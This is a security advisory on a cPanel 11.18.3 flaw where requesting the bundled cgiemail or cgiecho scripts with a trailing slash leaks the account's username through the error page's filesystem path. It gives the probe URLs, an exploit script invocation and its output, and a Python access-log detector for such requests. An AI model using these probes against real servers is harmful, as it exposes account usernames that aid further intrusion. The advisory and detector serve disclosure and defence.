cPanel 11.18.3-cPanel_get_username - remote users could obtain the username associated with a cPanel account



DESCRIPTION


This is not a cPanel issue directly, but an issue with third-party software installed by default on cPanel servers. The cgiemail application comes with 2 scripts: cgiemail and cgiecho. By default, they were placed in /home/username/public_html/cgi-bin/ when a new account was created. They also exist globally in /usr/local/cpanel/cgi-sys/ by default. Sending a request to either of those files with a "/" appended to the request would reveal the username associated with the account, because the error page prints the full filesystem path under the account's home directory (see the output below).


[user@host ~]$ ./11.18.3-STABLE_21703-cgiemail_get_cPanel_username.pl attacker.net
/home/xxxxx/public_html/


cgiemail:

http://example.com/cgi-bin/cgiemail/
http://example.com/cgi-sys/cgiemail/
Error
No email was sent due to an error.

500 Empty template file

/home/example/public_html/index.html

cgiemail 1.6 


cgiecho:

http://example.com/cgi-bin/cgiecho/
http://example.com/cgi-sys/cgiecho/
Error
Form was not processed due to an error.

500 Empty template file

/home/example/public_html/index.html

cgiemail 1.6 


Note that /cgi-sys/ is ScriptAlias'd in httpd.conf:

ScriptAlias /cgi-sys /usr/local/cpanel/cgi-sys/



IMPACT


Remote users could obtain the cPanel username associated with a domain. This issue still exists in the cgiemail package. cPanel's patch for it is located at /usr/local/cpanel/src/3rdparty/mit/patches/cgiemail-1.6.patch.
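
A log check for the request described in the DESCRIPTION section, as an added example that is not part of the original advisory or of cPanel's patch: it flags access-log entries that hit cgiemail or cgiecho under /cgi-bin/ or /cgi-sys/ with only a trailing "/". It assumes Apache common/combined log format; the function names and sample log lines are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Apache common/combined prefix: host ident user [time] "METHOD target PROTO" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} '
)
# The advisory's request: script name followed by a bare trailing slash.
# Normal cgiemail use puts a template path after the slash, so it is not flagged.
PROBE_RE = re.compile(r'^/+(?:cgi-bin|cgi-sys)/+(?:cgiemail|cgiecho)/+$')


def find_probes(lines):
    """Return (client_ip, timestamp, path) for each bare-slash cgiemail/cgiecho request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line this parser understands
        path = unquote(m.group("target").split("?", 1)[0])  # drop query, decode %xx
        if PROBE_RE.match(path):
            hits.append((m.group("ip"), m.group("ts"), path))
    return hits


def probes_by_client(lines):
    """Count flagged requests per client address."""
    return Counter(ip for ip, _, _ in find_probes(lines))


# Constructed sample log lines (addresses, times, statuses and sizes are made up).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Mar/2008:10:01:02 -0500] "GET /cgi-bin/cgiemail/ HTTP/1.1" 500 312 "-" "-"',
    '192.0.2.10 - - [12/Mar/2008:10:01:03 -0500] "GET /cgi-sys/cgiecho/ HTTP/1.1" 500 318 "-" "-"',
    '198.51.100.7 - - [12/Mar/2008:10:05:40 -0500] "POST /cgi-bin/cgiemail/forms/contact.txt HTTP/1.1" 200 901 "-" "-"',
    '198.51.100.7 - - [12/Mar/2008:10:05:41 -0500] "GET /index.html HTTP/1.1" 200 4410 "-" "-"',
    '203.0.113.5 - - [12/Mar/2008:11:20:00 -0500] "GET /cgi-sys/cgiemail/?x=1 HTTP/1.0" 500 312 "-" "-"',
    'this line is not an access-log entry',
]

if __name__ == "__main__":
    for ip, ts, path in find_probes(SAMPLE_LOG):
        print(f"{ts}  {ip}  {path}")
    print(dict(probes_by_client(SAMPLE_LOG)))
```

On a cPanel server, run it over each domain's access log; any hit that predates the patch means that account's username should be treated as disclosed.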